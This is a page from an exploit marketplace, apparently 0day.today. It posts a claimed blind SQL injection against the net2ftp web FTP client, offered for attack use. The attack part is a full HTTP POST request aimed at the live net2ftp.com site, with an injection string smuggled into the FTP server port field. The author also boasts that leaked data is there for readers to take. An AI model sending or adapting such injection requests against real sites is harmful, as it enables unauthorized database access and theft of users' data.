[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

net2ftp Blind Sql Injection Vulnerability

Author
B3RM0D4
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-19307
Category
web applications
Date add
02-09-2012
Platform
php
============================================
NET2FTP BLIND SQL INJECTION Vulnerability
============================================
# Exploit Title: NET2FTP BLIND SQL INJECTION Vulnerability
# Author: B3RM0D4 (WALID.K<"
# Date: 09/02/2012
# Vendor or Software Link: http://www.net2ftp.com/
# Category: WebApp
# Version: All Version
# Contact: B3RM0D4@GM4IL.C0M
# Website: 1337day.com
# Greetings to: YENOMEN ALL THE MH COMMUNITY
# Tested on: Debian / WIN XP 

########################################################################################
[Product Detail]

THE MOST FAMOUS ONLINE FTP WEBSITE 
12MO OF DATA GOT LEAKED GET YOUR'S ;) 

[Vulnerability]

POST http://www.net2ftp.com/index.php HTTP/1.1
Host: http://www.net2ftp.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ar,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 191
Cookie: PHPSESSID=s9Q%252Cpx8D0mEpxY0siQF6DDa19Gc

PHPSESSID=s9Q%252Cpx8D0mEpxY0siQF6DDa19Gc&ftpserver=&ftpserverport=21'%2B'ACUtwoACU&username=&password=&directory=&ftpmode=automatic&Login=Login&state=browse&state2=main&language=en&skin=blue



#  0day.today [2024-12-25]  #